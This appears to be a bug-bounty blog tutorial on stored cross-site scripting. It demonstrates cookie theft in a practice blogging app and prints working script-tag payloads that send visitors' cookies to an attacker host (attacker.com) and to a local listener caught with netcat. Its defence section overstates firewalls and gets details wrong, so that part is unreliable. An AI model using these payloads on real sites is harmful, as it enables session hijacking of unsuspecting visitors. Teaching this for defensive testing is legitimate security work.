by Anshuman    May 29, 2019

Introduction to Stored XSS

When an attacker browsing a web application and found a vulnerability which allows him to embed an HTML tag into the input box and the embedded tag become a permanent item of that page and then the browser will parse this code every time whenever the page will get loaded.

For example in a blogging website attacker found a vulnerability in the comment section and embed this comment.

Attacker’s Comment — Nice Blog! a similar type of blog I have also written but with some new content, please visit my site to read more

<script src="http://attacker.com/stealcookie.js"></script>

The "stealcookie.js" is designed to steal the cookie of the browser and as this file is hosted in some other site so that the attacker can able to access it remotely and when the user’s account gets compromised then the attacker will have full control to the user account.

But the user will have no idea at all what is happening in the background with this piece of comment.

Introduction to Stored XSS

MySpace and Tweetdeck are the best examples of Stored XSS and as you guys might have known when the attacker injects the JavaScript code it caused serious damage to both of these websites as once the code injected and whoever visit that webpage then it will get executed again and again.

How to prevent Stored XSS attack?

To prevent any XSS attack, Web Application Firewall (WAF) is the best solution to protect a web application.

WAF is an automation tool which is designed by artificial intelligence and machine learning algorithms to filter specific content of web application and it can prevent attacks from XSS, SQL Injection, File inclusion and security misconfiguration.

Every time whenever a user will send any request to the web server first the request will go the WAF and WAF will filter the request and then the request will get transferred to the web server.

Same will be applied to the Web server also when the web server will send the response to the user first the response will go to the WAF then WAF will filter the response then it will get transferred to the user.

For more information

1.Web application firewall

2.What is a Web Application Firewall (WAF)?

How to perform Stored XSS in a Blogging web application?

Now please choose Cross-site-Scripting — Stored (Blog) from the drop-down menu and click Hack.

As you can see from the screenshot it’s a demo blogging application and there is an input box where user can comment.

So to test let’s enter one comment "Nice Blog" and hit submit.

As you can see from the screenshot the comment gets posted and this comment gets stored in the database.

So now let’s enter the JavaScript payload to steal the browser cookie.

Payload comment to steal the cookie

Nice Blog! a similar type of blog I have also written but with some new content, please visit my site to read more

<script src="http://192.168.2.12:9000?cookie"+document.cookie></script>

As you can see from the above screenshot the comment gets posted in the blog and with the comment, I am injecting the JavaScript code also and this is a GET request with a query parameter "cookie" and "document.cookie" will fetch the current browser cookie.

And I’ll fetch this request with the netcat command through a reverse shell.

As you can see from the screenshot after posting the comment immediately I received the connection with the browser cookie.

This is one way to steal the cookie and there are several techniques where an attacker can steal the cookie of the browser and every time when you load the webpage the code will get executed and it will fetch the browser cookie.

So that attacker can access anybody browser cookie whoever visit this webpage.

For more information

1.Testing for Stored Cross site scripting (OTG-INPVAL-002)

2.Stored XSS)

I hope you guys like this post-bye bye for now.

Happy Hacking :)

BUG BOUNTY